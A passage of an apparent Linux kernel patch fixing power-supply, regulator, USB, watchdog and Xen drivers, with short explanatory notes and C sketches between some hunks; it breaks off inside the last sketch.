+-	ret = power_supply_get_property_from_supplier(bq->charger,
++	ret = power_supply_get_property_from_supplier(psy,
+ 						      POWER_SUPPLY_PROP_USB_TYPE,
+ 						      &val);
+ 	if (ret)
+@@ -675,6 +675,7 @@ static void bq25890_charger_external_power_changed(struct power_supply *psy)
+ 	}
+ 
+ 	bq25890_field_write(bq, F_IINLIM, input_current_limit);
++	power_supply_changed(psy);
+ }
+ 
+ static int bq25890_get_chip_state(struct bq25890_device *bq,
+@@ -973,6 +974,8 @@ static void bq25890_pump_express_work(struct work_struct *data)
+ 	dev_info(bq->dev, "Hi-voltage charging requested, input voltage is %d mV\n",
+ 		 voltage);
+ 
++	power_supply_changed(bq->charger);
++
+ 	return;
+ error_print:
+ 	bq25890_field_write(bq, F_PUMPX_EN, 0);
+diff --git a/drivers/power/supply/bq27xxx_battery.c b/drivers/power/supply/bq27xxx_battery.c
+index 8bf048fbd36a2..17a09d103a59c 100644
+--- a/drivers/power/supply/bq27xxx_battery.c
++++ b/drivers/power/supply/bq27xxx_battery.c
+@@ -1761,60 +1761,6 @@ static int bq27xxx_battery_read_health(struct bq27xxx_device_info *di)
+ 	return POWER_SUPPLY_HEALTH_GOOD;
+ }
+ 
+-void bq27xxx_battery_update(struct bq27xxx_device_info *di)
+-{
+-	struct bq27xxx_reg_cache cache = {0, };
+-	bool has_singe_flag = di->opts & BQ27XXX_O_ZERO;
+-
+-	cache.flags = bq27xxx_read(di, BQ27XXX_REG_FLAGS, has_singe_flag);
+-	if ((cache.flags & 0xff) == 0xff)
+-		cache.flags = -1; /* read error */
+-	if (cache.flags >= 0) {
+-		cache.temperature = bq27xxx_battery_read_temperature(di);
+-		if (di->regs[BQ27XXX_REG_TTE] != INVALID_REG_ADDR)
+-			cache.time_to_empty = bq27xxx_battery_read_time(di, BQ27XXX_REG_TTE);
+-		if (di->regs[BQ27XXX_REG_TTECP] != INVALID_REG_ADDR)
+-			cache.time_to_empty_avg = bq27xxx_battery_read_time(di, BQ27XXX_REG_TTECP);
+-		if (di->regs[BQ27XXX_REG_TTF] != INVALID_REG_ADDR)
+-			cache.time_to_full = bq27xxx_battery_read_time(di, BQ27XXX_REG_TTF);
+-
+-		cache.charge_full = bq27xxx_battery_read_fcc(di);
+-		cache.capacity = bq27xxx_battery_read_soc(di);
+-		if (di->regs[BQ27XXX_REG_AE] != INVALID_REG_ADDR)
+-			cache.energy = bq27xxx_battery_read_energy(di);
+-		di->cache.flags = cache.flags;
+-		cache.health = bq27xxx_battery_read_health(di);
+-		if (di->regs[BQ27XXX_REG_CYCT] != INVALID_REG_ADDR)
+-			cache.cycle_count = bq27xxx_battery_read_cyct(di);
+-
+-		/* We only have to read charge design full once */
+-		if (di->charge_design_full <= 0)
+-			di->charge_design_full = bq27xxx_battery_read_dcap(di);
+-	}
+-
+-	if ((di->cache.capacity != cache.capacity) ||
+-	    (di->cache.flags != cache.flags))
+-		power_supply_changed(di->bat);
+-
+-	if (memcmp(&di->cache, &cache, sizeof(cache)) != 0)
+-		di->cache = cache;
+-
+-	di->last_update = jiffies;
+-}
+-EXPORT_SYMBOL_GPL(bq27xxx_battery_update);
+-
+-static void bq27xxx_battery_poll(struct work_struct *work)
+-{
+-	struct bq27xxx_device_info *di =
+-			container_of(work, struct bq27xxx_device_info,
+-				     work.work);
+-
+-	bq27xxx_battery_update(di);
+-
+-	if (poll_interval > 0)
+-		schedule_delayed_work(&di->work, poll_interval * HZ);
+-}
+-
+ static bool bq27xxx_battery_is_full(struct bq27xxx_device_info *di, int flags)
+ {
+ 	if (di->opts & BQ27XXX_O_ZERO)
+@@ -1833,7 +1779,8 @@ static bool bq27xxx_battery_is_full(struct bq27xxx_device_info *di, int flags)
+ static int bq27xxx_battery_current_and_status(
+ 	struct bq27xxx_device_info *di,
+ 	union power_supply_propval *val_curr,
+-	union power_supply_propval *val_status)
++	union power_supply_propval *val_status,
++	struct bq27xxx_reg_cache *cache)
+ {
+ 	bool single_flags = (di->opts & BQ27XXX_O_ZERO);
+ 	int curr;
+@@ -1845,10 +1792,14 @@ static int bq27xxx_battery_current_and_status(
+ 		return curr;
+ 	}
+ 
+-	flags = bq27xxx_read(di, BQ27XXX_REG_FLAGS, single_flags);
+-	if (flags < 0) {
+-		dev_err(di->dev, "error reading flags\n");
+-		return flags;
++	if (cache) {
++		flags = cache->flags;
++	} else {
++		flags = bq27xxx_read(di, BQ27XXX_REG_FLAGS, single_flags);
++		if (flags < 0) {
++			dev_err(di->dev, "error reading flags\n");
++			return flags;
++		}
+ 	}
+ 
+ 	if (di->opts & BQ27XXX_O_ZERO) {
+@@ -1883,6 +1834,78 @@ static int bq27xxx_battery_current_and_status(
+ 	return 0;
+ }
+ 
++static void bq27xxx_battery_update_unlocked(struct bq27xxx_device_info *di)
++{
++	union power_supply_propval status = di->last_status;
++	struct bq27xxx_reg_cache cache = {0, };
++	bool has_singe_flag = di->opts & BQ27XXX_O_ZERO;
++
++	cache.flags = bq27xxx_read(di, BQ27XXX_REG_FLAGS, has_singe_flag);
++	if ((cache.flags & 0xff) == 0xff)
++		cache.flags = -1; /* read error */
++	if (cache.flags >= 0) {
++		cache.temperature = bq27xxx_battery_read_temperature(di);
++		if (di->regs[BQ27XXX_REG_TTE] != INVALID_REG_ADDR)
++			cache.time_to_empty = bq27xxx_battery_read_time(di, BQ27XXX_REG_TTE);
++		if (di->regs[BQ27XXX_REG_TTECP] != INVALID_REG_ADDR)
++			cache.time_to_empty_avg = bq27xxx_battery_read_time(di, BQ27XXX_REG_TTECP);
++		if (di->regs[BQ27XXX_REG_TTF] != INVALID_REG_ADDR)
++			cache.time_to_full = bq27xxx_battery_read_time(di, BQ27XXX_REG_TTF);
++
++		cache.charge_full = bq27xxx_battery_read_fcc(di);
++		cache.capacity = bq27xxx_battery_read_soc(di);
++		if (di->regs[BQ27XXX_REG_AE] != INVALID_REG_ADDR)
++			cache.energy = bq27xxx_battery_read_energy(di);
++		di->cache.flags = cache.flags;
++		cache.health = bq27xxx_battery_read_health(di);
++		if (di->regs[BQ27XXX_REG_CYCT] != INVALID_REG_ADDR)
++			cache.cycle_count = bq27xxx_battery_read_cyct(di);
++
++		/*
++		 * On gauges with signed current reporting, the current must be
++		 * checked to detect charging <-> discharging status changes.
++		 */
++		if (!(di->opts & BQ27XXX_O_ZERO))
++			bq27xxx_battery_current_and_status(di, NULL, &status, &cache);
++
++		/* We only have to read charge design full once */
++		if (di->charge_design_full <= 0)
++			di->charge_design_full = bq27xxx_battery_read_dcap(di);
++	}
++
++	if ((di->cache.capacity != cache.capacity) ||
++	    (di->cache.flags != cache.flags) ||
++	    (di->last_status.intval != status.intval)) {
++		di->last_status.intval = status.intval;
++		power_supply_changed(di->bat);
++	}
++
++	if (memcmp(&di->cache, &cache, sizeof(cache)) != 0)
++		di->cache = cache;
++
++	di->last_update = jiffies;
++
++	if (!di->removed && poll_interval > 0)
++		mod_delayed_work(system_wq, &di->work, poll_interval * HZ);
++}
++
++void bq27xxx_battery_update(struct bq27xxx_device_info *di)
++{
++	mutex_lock(&di->lock);
++	bq27xxx_battery_update_unlocked(di);
++	mutex_unlock(&di->lock);
++}
++EXPORT_SYMBOL_GPL(bq27xxx_battery_update);
++
++static void bq27xxx_battery_poll(struct work_struct *work)
++{
++	struct bq27xxx_device_info *di =
++			container_of(work, struct bq27xxx_device_info,
++				     work.work);
++
++	bq27xxx_battery_update(di);
++}
++
+ /*
+  * Get the average power in µW
+  * Return < 0 if something fails.
+@@ -1985,10 +2008,8 @@ static int bq27xxx_battery_get_property(struct power_supply *psy,
+ 	struct bq27xxx_device_info *di = power_supply_get_drvdata(psy);
+ 
+ 	mutex_lock(&di->lock);
+-	if (time_is_before_jiffies(di->last_update + 5 * HZ)) {
+-		cancel_delayed_work_sync(&di->work);
+-		bq27xxx_battery_poll(&di->work.work);
+-	}
++	if (time_is_before_jiffies(di->last_update + 5 * HZ))
++		bq27xxx_battery_update_unlocked(di);
+ 	mutex_unlock(&di->lock);
+ 
+ 	if (psp != POWER_SUPPLY_PROP_PRESENT && di->cache.flags < 0)
+@@ -1996,7 +2017,7 @@ static int bq27xxx_battery_get_property(struct power_supply *psy,
+ 
+ 	switch (psp) {
+ 	case POWER_SUPPLY_PROP_STATUS:
+-		ret = bq27xxx_battery_current_and_status(di, NULL, val);
++		ret = bq27xxx_battery_current_and_status(di, NULL, val, NULL);
+ 		break;
+ 	case POWER_SUPPLY_PROP_VOLTAGE_NOW:
+ 		ret = bq27xxx_battery_voltage(di, val);
+@@ -2005,7 +2026,7 @@ static int bq27xxx_battery_get_property(struct power_supply *psy,
+ 		val->intval = di->cache.flags < 0 ? 0 : 1;
+ 		break;
+ 	case POWER_SUPPLY_PROP_CURRENT_NOW:
+-		ret = bq27xxx_battery_current_and_status(di, val, NULL);
++		ret = bq27xxx_battery_current_and_status(di, val, NULL, NULL);
+ 		break;
+ 	case POWER_SUPPLY_PROP_CAPACITY:
+ 		ret = bq27xxx_simple_value(di->cache.capacity, val);
+@@ -2078,8 +2099,8 @@ static void bq27xxx_external_power_changed(struct power_supply *psy)
+ {
+ 	struct bq27xxx_device_info *di = power_supply_get_drvdata(psy);
+ 
+-	cancel_delayed_work_sync(&di->work);
+-	schedule_delayed_work(&di->work, 0);
++	/* After charger plug in/out wait 0.5s for things to stabilize */
++	mod_delayed_work(system_wq, &di->work, HZ / 2);
+ }
+ 
+ int bq27xxx_battery_setup(struct bq27xxx_device_info *di)
+@@ -2127,22 +2148,18 @@ EXPORT_SYMBOL_GPL(bq27xxx_battery_setup);
+ 
+ void bq27xxx_battery_teardown(struct bq27xxx_device_info *di)
+ {
+-	/*
+-	 * power_supply_unregister call bq27xxx_battery_get_property which
+-	 * call bq27xxx_battery_poll.
+-	 * Make sure that bq27xxx_battery_poll will not call
+-	 * schedule_delayed_work again after unregister (which cause OOPS).
+-	 */
+-	poll_interval = 0;
+-
+-	cancel_delayed_work_sync(&di->work);
+-
+-	power_supply_unregister(di->bat);
+-
+ 	mutex_lock(&bq27xxx_list_lock);
+ 	list_del(&di->list);
+ 	mutex_unlock(&bq27xxx_list_lock);
+ 
++	/* Set removed to avoid bq27xxx_battery_update() re-queuing the work */
++	mutex_lock(&di->lock);
++	di->removed = true;
++	mutex_unlock(&di->lock);
++
++	cancel_delayed_work_sync(&di->work);
++
++	power_supply_unregister(di->bat);
+ 	mutex_destroy(&di->lock);
+ }
+ EXPORT_SYMBOL_GPL(bq27xxx_battery_teardown);
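
The bq27xxx teardown above closes a race with the self-requeueing poll work: mark the device removed under the lock first, then cancel the work, and only then unregister the supply. A kernel-style condensation of that ordering; the struct and names are simplified stand-ins for the driver's types:

#include <linux/container_of.h>
#include <linux/jiffies.h>
#include <linux/mutex.h>
#include <linux/power_supply.h>
#include <linux/workqueue.h>

struct dev_info {
	struct mutex lock;
	bool removed;
	struct delayed_work work;
	struct power_supply *bat;
};

static int poll_interval = 360;	/* seconds; stand-in for the module param */

/* The worker re-arms itself, but only after checking 'removed' under
 * the same lock the teardown path takes. */
static void poll_work(struct work_struct *work)
{
	struct dev_info *di = container_of(work, struct dev_info, work.work);

	mutex_lock(&di->lock);
	/* ... refresh cached readings ... */
	if (!di->removed && poll_interval > 0)
		mod_delayed_work(system_wq, &di->work, poll_interval * HZ);
	mutex_unlock(&di->lock);
}

static void teardown(struct dev_info *di)
{
	mutex_lock(&di->lock);
	di->removed = true;			/* no re-arming after this */
	mutex_unlock(&di->lock);

	cancel_delayed_work_sync(&di->work);	/* waits out a running poll */
	power_supply_unregister(di->bat);
	mutex_destroy(&di->lock);
}
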
+diff --git a/drivers/power/supply/bq27xxx_battery_i2c.c b/drivers/power/supply/bq27xxx_battery_i2c.c
+index 94b00bb89c177..0713a52a25107 100644
+--- a/drivers/power/supply/bq27xxx_battery_i2c.c
++++ b/drivers/power/supply/bq27xxx_battery_i2c.c
+@@ -179,7 +179,7 @@ static int bq27xxx_battery_i2c_probe(struct i2c_client *client,
+ 	i2c_set_clientdata(client, di);
+ 
+ 	if (client->irq) {
+-		ret = devm_request_threaded_irq(&client->dev, client->irq,
++		ret = request_threaded_irq(client->irq,
+ 				NULL, bq27xxx_battery_irq_handler_thread,
+ 				IRQF_ONESHOT,
+ 				di->name, di);
+@@ -209,6 +209,7 @@ static void bq27xxx_battery_i2c_remove(struct i2c_client *client)
+ {
+ 	struct bq27xxx_device_info *di = i2c_get_clientdata(client);
+ 
++	free_irq(client->irq, di);
+ 	bq27xxx_battery_teardown(di);
+ 
+ 	mutex_lock(&battery_mutex);
+diff --git a/drivers/power/supply/mt6360_charger.c b/drivers/power/supply/mt6360_charger.c
+index 3abaa72e06683..f1248faf59058 100644
+--- a/drivers/power/supply/mt6360_charger.c
++++ b/drivers/power/supply/mt6360_charger.c
+@@ -799,7 +799,9 @@ static int mt6360_charger_probe(struct platform_device *pdev)
+ 	mci->vinovp = 6500000;
+ 	mutex_init(&mci->chgdet_lock);
+ 	platform_set_drvdata(pdev, mci);
+-	devm_work_autocancel(&pdev->dev, &mci->chrdet_work, mt6360_chrdet_work);
++	ret = devm_work_autocancel(&pdev->dev, &mci->chrdet_work, mt6360_chrdet_work);
++	if (ret)
++		return dev_err_probe(&pdev->dev, ret, "Failed to set delayed work\n");
+ 
+ 	ret = device_property_read_u32(&pdev->dev, "richtek,vinovp-microvolt", &mci->vinovp);
+ 	if (ret)
+diff --git a/drivers/power/supply/power_supply_leds.c b/drivers/power/supply/power_supply_leds.c
+index d69880cc35931..b7a2778f878de 100644
+--- a/drivers/power/supply/power_supply_leds.c
++++ b/drivers/power/supply/power_supply_leds.c
+@@ -34,8 +34,9 @@ static void power_supply_update_bat_leds(struct power_supply *psy)
+ 		led_trigger_event(psy->charging_full_trig, LED_FULL);
+ 		led_trigger_event(psy->charging_trig, LED_OFF);
+ 		led_trigger_event(psy->full_trig, LED_FULL);
+-		led_trigger_event(psy->charging_blink_full_solid_trig,
+-			LED_FULL);
++		/* Going from blink to LED on requires a LED_OFF event to stop blink */
++		led_trigger_event(psy->charging_blink_full_solid_trig, LED_OFF);
++		led_trigger_event(psy->charging_blink_full_solid_trig, LED_FULL);
+ 		break;
+ 	case POWER_SUPPLY_STATUS_CHARGING:
+ 		led_trigger_event(psy->charging_full_trig, LED_FULL);
+diff --git a/drivers/power/supply/sbs-charger.c b/drivers/power/supply/sbs-charger.c
+index b08f7d0c41815..bc927c0ddd343 100644
+--- a/drivers/power/supply/sbs-charger.c
++++ b/drivers/power/supply/sbs-charger.c
+@@ -24,7 +24,7 @@
+ #define SBS_CHARGER_REG_STATUS			0x13
+ #define SBS_CHARGER_REG_ALARM_WARNING		0x16
+ 
+-#define SBS_CHARGER_STATUS_CHARGE_INHIBITED	BIT(1)
++#define SBS_CHARGER_STATUS_CHARGE_INHIBITED	BIT(0)
+ #define SBS_CHARGER_STATUS_RES_COLD		BIT(9)
+ #define SBS_CHARGER_STATUS_RES_HOT		BIT(10)
+ #define SBS_CHARGER_STATUS_BATTERY_PRESENT	BIT(14)
+diff --git a/drivers/regulator/mt6359-regulator.c b/drivers/regulator/mt6359-regulator.c
+index de3b0462832cd..f94f87c5407ae 100644
+--- a/drivers/regulator/mt6359-regulator.c
++++ b/drivers/regulator/mt6359-regulator.c
+@@ -951,9 +951,12 @@ static int mt6359_regulator_probe(struct platform_device *pdev)
+ 	struct regulator_config config = {};
+ 	struct regulator_dev *rdev;
+ 	struct mt6359_regulator_info *mt6359_info;
+-	int i, hw_ver;
++	int i, hw_ver, ret;
++
++	ret = regmap_read(mt6397->regmap, MT6359P_HWCID, &hw_ver);
++	if (ret)
++		return ret;
+ 
+-	regmap_read(mt6397->regmap, MT6359P_HWCID, &hw_ver);
+ 	if (hw_ver >= MT6359P_CHIP_VER)
+ 		mt6359_info = mt6359p_regulators;
+ 	else
+diff --git a/drivers/regulator/pca9450-regulator.c b/drivers/regulator/pca9450-regulator.c
+index 14b7d33765162..0fcda40cefa6d 100644
+--- a/drivers/regulator/pca9450-regulator.c
++++ b/drivers/regulator/pca9450-regulator.c
+@@ -264,7 +264,7 @@ static const struct pca9450_regulator_desc pca9450a_regulators[] = {
+ 			.vsel_reg = PCA9450_REG_BUCK2OUT_DVS0,
+ 			.vsel_mask = BUCK2OUT_DVS0_MASK,
+ 			.enable_reg = PCA9450_REG_BUCK2CTRL,
+-			.enable_mask = BUCK1_ENMODE_MASK,
++			.enable_mask = BUCK2_ENMODE_MASK,
+ 			.ramp_reg = PCA9450_REG_BUCK2CTRL,
+ 			.ramp_mask = BUCK2_RAMP_MASK,
+ 			.ramp_delay_table = pca9450_dvs_buck_ramp_table,
+@@ -502,7 +502,7 @@ static const struct pca9450_regulator_desc pca9450bc_regulators[] = {
+ 			.vsel_reg = PCA9450_REG_BUCK2OUT_DVS0,
+ 			.vsel_mask = BUCK2OUT_DVS0_MASK,
+ 			.enable_reg = PCA9450_REG_BUCK2CTRL,
+-			.enable_mask = BUCK1_ENMODE_MASK,
++			.enable_mask = BUCK2_ENMODE_MASK,
+ 			.ramp_reg = PCA9450_REG_BUCK2CTRL,
+ 			.ramp_mask = BUCK2_RAMP_MASK,
+ 			.ramp_delay_table = pca9450_dvs_buck_ramp_table,
+diff --git a/drivers/tee/optee/smc_abi.c b/drivers/tee/optee/smc_abi.c
+index a1c1fa1a9c28a..e6e0428f8e7be 100644
+--- a/drivers/tee/optee/smc_abi.c
++++ b/drivers/tee/optee/smc_abi.c
+@@ -984,8 +984,10 @@ static u32 get_async_notif_value(optee_invoke_fn *invoke_fn, bool *value_valid,
+ 
+ 	invoke_fn(OPTEE_SMC_GET_ASYNC_NOTIF_VALUE, 0, 0, 0, 0, 0, 0, 0, &res);
+ 
+-	if (res.a0)
++	if (res.a0) {
++		*value_valid = false;
+ 		return 0;
++	}
+ 	*value_valid = (res.a2 & OPTEE_SMC_ASYNC_NOTIF_VALUE_VALID);
+ 	*value_pending = (res.a2 & OPTEE_SMC_ASYNC_NOTIF_VALUE_PENDING);
+ 	return res.a1;
+diff --git a/drivers/usb/core/usb.c b/drivers/usb/core/usb.c
+index a415206cab043..3500e3c94c4b8 100644
+--- a/drivers/usb/core/usb.c
++++ b/drivers/usb/core/usb.c
+@@ -206,6 +206,82 @@ int usb_find_common_endpoints_reverse(struct usb_host_interface *alt,
+ }
+ EXPORT_SYMBOL_GPL(usb_find_common_endpoints_reverse);
+ 
++/**
++ * usb_find_endpoint() - Given an endpoint address, search for the endpoint's
++ * usb_host_endpoint structure in an interface's current altsetting.
++ * @intf: the interface whose current altsetting should be searched
++ * @ep_addr: the endpoint address (number and direction) to find
++ *
++ * Search the altsetting's list of endpoints for one with the specified address.
++ *
++ * Return: Pointer to the usb_host_endpoint if found, %NULL otherwise.
++ */
++static const struct usb_host_endpoint *usb_find_endpoint(
++		const struct usb_interface *intf, unsigned int ep_addr)
++{
++	int n;
++	const struct usb_host_endpoint *ep;
++
++	n = intf->cur_altsetting->desc.bNumEndpoints;
++	ep = intf->cur_altsetting->endpoint;
++	for (; n > 0; (--n, ++ep)) {
++		if (ep->desc.bEndpointAddress == ep_addr)
++			return ep;
++	}
++	return NULL;
++}
++
++/**
++ * usb_check_bulk_endpoints - Check whether an interface's current altsetting
++ * contains a set of bulk endpoints with the given addresses.
++ * @intf: the interface whose current altsetting should be searched
++ * @ep_addrs: 0-terminated array of the endpoint addresses (number and
++ * direction) to look for
++ *
++ * Search for endpoints with the specified addresses and check their types.
++ *
++ * Return: %true if all the endpoints are found and are bulk, %false otherwise.
++ */
++bool usb_check_bulk_endpoints(
++		const struct usb_interface *intf, const u8 *ep_addrs)
++{
++	const struct usb_host_endpoint *ep;
++
++	for (; *ep_addrs; ++ep_addrs) {
++		ep = usb_find_endpoint(intf, *ep_addrs);
++		if (!ep || !usb_endpoint_xfer_bulk(&ep->desc))
++			return false;
++	}
++	return true;
++}
++EXPORT_SYMBOL_GPL(usb_check_bulk_endpoints);
++
++/**
++ * usb_check_int_endpoints - Check whether an interface's current altsetting
++ * contains a set of interrupt endpoints with the given addresses.
++ * @intf: the interface whose current altsetting should be searched
++ * @ep_addrs: 0-terminated array of the endpoint addresses (number and
++ * direction) to look for
++ *
++ * Search for endpoints with the specified addresses and check their types.
++ *
++ * Return: %true if all the endpoints are found and are interrupt,
++ * %false otherwise.
++ */
++bool usb_check_int_endpoints(
++		const struct usb_interface *intf, const u8 *ep_addrs)
++{
++	const struct usb_host_endpoint *ep;
++
++	for (; *ep_addrs; ++ep_addrs) {
++		ep = usb_find_endpoint(intf, *ep_addrs);
++		if (!ep || !usb_endpoint_xfer_int(&ep->desc))
++			return false;
++	}
++	return true;
++}
++EXPORT_SYMBOL_GPL(usb_check_int_endpoints);
++
+ /**
+  * usb_find_alt_setting() - Given a configuration, find the alternate setting
+  * for the given interface.
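
The new usb_check_bulk_endpoints()/usb_check_int_endpoints() helpers above take a 0-terminated array of endpoint addresses and confirm each one exists in the current altsetting with the expected transfer type, letting probe routines validate device-supplied descriptors up front (the sisusbvga and udlfb hunks below are callers). A standalone mock of the walk, with simplified types in place of the real USB structures:

#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

struct ep { uint8_t addr; bool bulk; };

/* Current altsetting of a hypothetical device: two bulk endpoints and
 * one interrupt endpoint. */
static const struct ep alt[] = {
	{ 0x01, true }, { 0x81, true }, { 0x82, false },
};

/* Mirror of the helper's contract: every address in the 0-terminated
 * list must be present and must have the bulk type. */
static bool check_bulk(const uint8_t *ep_addrs)
{
	for (; *ep_addrs; ++ep_addrs) {
		bool ok = false;

		for (size_t i = 0; i < sizeof(alt) / sizeof(alt[0]); i++)
			if (alt[i].addr == *ep_addrs && alt[i].bulk)
				ok = true;
		if (!ok)
			return false;
	}
	return true;
}

int main(void)
{
	const uint8_t good[] = { 0x01, 0x81, 0 };
	const uint8_t bad[]  = { 0x01, 0x82, 0 };	/* 0x82 is interrupt */

	printf("%d %d\n", check_bulk(good), check_bulk(bad));	/* 1 0 */
	return 0;
}
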
+diff --git a/drivers/usb/dwc3/core.h b/drivers/usb/dwc3/core.h
+index 582ebd9cf9c2e..bb57bc9bc17cb 100644
+--- a/drivers/usb/dwc3/core.h
++++ b/drivers/usb/dwc3/core.h
+@@ -1110,6 +1110,7 @@ struct dwc3_scratchpad_array {
+  *	3	- Reserved
+  * @dis_metastability_quirk: set to disable metastability quirk.
+  * @dis_split_quirk: set to disable split boundary.
++ * @suspended: set to track suspend event due to U3/L2.
+  * @imod_interval: set the interrupt moderation interval in 250ns
+  *			increments or 0 to disable.
+  * @max_cfg_eps: current max number of IN eps used across all USB configs.
+@@ -1327,6 +1328,7 @@ struct dwc3 {
+ 
+ 	unsigned		dis_split_quirk:1;
+ 	unsigned		async_callbacks:1;
++	unsigned		suspended:1;
+ 
+ 	u16			imod_interval;
+ 
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index d12cb8f0d1f48..8cd0d919ef63d 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -3828,6 +3828,8 @@ static void dwc3_gadget_disconnect_interrupt(struct dwc3 *dwc)
+ {
+ 	int			reg;
+ 
++	dwc->suspended = false;
++
+ 	dwc3_gadget_set_link_state(dwc, DWC3_LINK_STATE_RX_DET);
+ 
+ 	reg = dwc3_readl(dwc->regs, DWC3_DCTL);
+@@ -3859,6 +3861,8 @@ static void dwc3_gadget_reset_interrupt(struct dwc3 *dwc)
+ {
+ 	u32			reg;
+ 
++	dwc->suspended = false;
++
+ 	/*
+ 	 * Ideally, dwc3_reset_gadget() would trigger the function
+ 	 * drivers to stop any active transfers through ep disable.
+@@ -4088,6 +4092,8 @@ static void dwc3_gadget_conndone_interrupt(struct dwc3 *dwc)
+ 
+ static void dwc3_gadget_wakeup_interrupt(struct dwc3 *dwc)
+ {
++	dwc->suspended = false;
++
+ 	/*
+ 	 * TODO take core out of low power mode when that's
+ 	 * implemented.
+@@ -4203,8 +4209,10 @@ static void dwc3_gadget_suspend_interrupt(struct dwc3 *dwc,
+ {
+ 	enum dwc3_link_state next = evtinfo & DWC3_LINK_STATE_MASK;
+ 
+-	if (dwc->link_state != next && next == DWC3_LINK_STATE_U3)
++	if (!dwc->suspended && next == DWC3_LINK_STATE_U3) {
++		dwc->suspended = true;
+ 		dwc3_suspend_gadget(dwc);
++	}
+ 
+ 	dwc->link_state = next;
+ }
+diff --git a/drivers/usb/misc/sisusbvga/sisusb.c b/drivers/usb/misc/sisusbvga/sisusb.c
+index f08de33d9ff38..8ed803c4a251d 100644
+--- a/drivers/usb/misc/sisusbvga/sisusb.c
++++ b/drivers/usb/misc/sisusbvga/sisusb.c
+@@ -3014,6 +3014,20 @@ static int sisusb_probe(struct usb_interface *intf,
+ 	struct usb_device *dev = interface_to_usbdev(intf);
+ 	struct sisusb_usb_data *sisusb;
+ 	int retval = 0, i;
++	static const u8 ep_addresses[] = {
++		SISUSB_EP_GFX_IN | USB_DIR_IN,
++		SISUSB_EP_GFX_OUT | USB_DIR_OUT,
++		SISUSB_EP_GFX_BULK_OUT | USB_DIR_OUT,
++		SISUSB_EP_GFX_LBULK_OUT | USB_DIR_OUT,
++		SISUSB_EP_BRIDGE_IN | USB_DIR_IN,
++		SISUSB_EP_BRIDGE_OUT | USB_DIR_OUT,
++		0};
++
++	/* Are the expected endpoints present? */
++	if (!usb_check_bulk_endpoints(intf, ep_addresses)) {
++		dev_err(&intf->dev, "Invalid USB2VGA device\n");
++		return -EINVAL;
++	}
+ 
+ 	dev_info(&dev->dev, "USB2VGA dongle found at address %d\n",
+ 			dev->devnum);
+diff --git a/drivers/video/fbdev/udlfb.c b/drivers/video/fbdev/udlfb.c
+index 216d49c9d47e5..256d9b61f4eaa 100644
+--- a/drivers/video/fbdev/udlfb.c
++++ b/drivers/video/fbdev/udlfb.c
+@@ -27,6 +27,8 @@
+ #include <video/udlfb.h>
+ #include "edid.h"
+ 
++#define OUT_EP_NUM	1	/* The endpoint number we will use */
++
+ static const struct fb_fix_screeninfo dlfb_fix = {
+ 	.id =           "udlfb",
+ 	.type =         FB_TYPE_PACKED_PIXELS,
+@@ -1652,7 +1654,7 @@ static int dlfb_usb_probe(struct usb_interface *intf,
+ 	struct fb_info *info;
+ 	int retval;
+ 	struct usb_device *usbdev = interface_to_usbdev(intf);
+-	struct usb_endpoint_descriptor *out;
++	static u8 out_ep[] = {OUT_EP_NUM + USB_DIR_OUT, 0};
+ 
+ 	/* usb initialization */
+ 	dlfb = kzalloc(sizeof(*dlfb), GFP_KERNEL);
+@@ -1666,9 +1668,9 @@ static int dlfb_usb_probe(struct usb_interface *intf,
+ 	dlfb->udev = usb_get_dev(usbdev);
+ 	usb_set_intfdata(intf, dlfb);
+ 
+-	retval = usb_find_common_endpoints(intf->cur_altsetting, NULL, &out, NULL, NULL);
+-	if (retval) {
+-		dev_err(&intf->dev, "Device should have at lease 1 bulk endpoint!\n");
++	if (!usb_check_bulk_endpoints(intf, out_ep)) {
++		dev_err(&intf->dev, "Invalid DisplayLink device!\n");
++		retval = -EINVAL;
+ 		goto error;
+ 	}
+ 
+@@ -1927,7 +1929,8 @@ retry:
+ 		}
+ 
+ 		/* urb->transfer_buffer_length set to actual before submit */
+-		usb_fill_bulk_urb(urb, dlfb->udev, usb_sndbulkpipe(dlfb->udev, 1),
++		usb_fill_bulk_urb(urb, dlfb->udev,
++			usb_sndbulkpipe(dlfb->udev, OUT_EP_NUM),
+ 			buf, size, dlfb_urb_completion, unode);
+ 		urb->transfer_flags |= URB_NO_TRANSFER_DMA_MAP;
+ 
+diff --git a/drivers/watchdog/sp5100_tco.c b/drivers/watchdog/sp5100_tco.c
+index fb426b7d81dac..14f8d8d90920f 100644
+--- a/drivers/watchdog/sp5100_tco.c
++++ b/drivers/watchdog/sp5100_tco.c
+@@ -115,6 +115,10 @@ static int tco_timer_start(struct watchdog_device *wdd)
+ 	val |= SP5100_WDT_START_STOP_BIT;
+ 	writel(val, SP5100_WDT_CONTROL(tco->tcobase));
+ 
++	/* This must be a distinct write. */
++	val |= SP5100_WDT_TRIGGER_BIT;
++	writel(val, SP5100_WDT_CONTROL(tco->tcobase));
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/xen/pvcalls-back.c b/drivers/xen/pvcalls-back.c
+index 28b2a1fa25ab5..0bff02ac0045c 100644
+--- a/drivers/xen/pvcalls-back.c
++++ b/drivers/xen/pvcalls-back.c
+@@ -321,8 +321,10 @@ static struct sock_mapping *pvcalls_new_active_socket(
+ 	void *page;
+ 
+ 	map = kzalloc(sizeof(*map), GFP_KERNEL);
+-	if (map == NULL)
++	if (map == NULL) {
++		sock_release(sock);
+ 		return NULL;
++	}
+ 
+ 	map->fedata = fedata;
+ 	map->sock = sock;
+@@ -414,10 +416,8 @@ static int pvcalls_back_connect(struct xenbus_device *dev,
+ 					req->u.connect.ref,
+ 					req->u.connect.evtchn,
+ 					sock);
+-	if (!map) {
++	if (!map)
+ 		ret = -EFAULT;
+-		sock_release(sock);
+-	}
+ 
+ out:
+ 	rsp = RING_GET_RESPONSE(&fedata->ring, fedata->ring.rsp_prod_pvt++);
+@@ -557,7 +557,6 @@ static void __pvcalls_back_accept(struct work_struct *work)
+ 					sock);
+ 	if (!map) {
+ 		ret = -EFAULT;
+-		sock_release(sock);
+ 		goto out_error;
+ 	}
+ 
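
In the pvcalls hunks above, sock_release() moves into pvcalls_new_active_socket() itself, so on any failure the helper owns and releases the socket, and the callers' duplicate releases are dropped. A standalone sketch of the take-ownership-on-failure convention, using a FILE * in place of a socket:

#include <stdio.h>
#include <stdlib.h>

struct mapping { FILE *f; };

/* Takes ownership of 'f': on failure the resource is released here,
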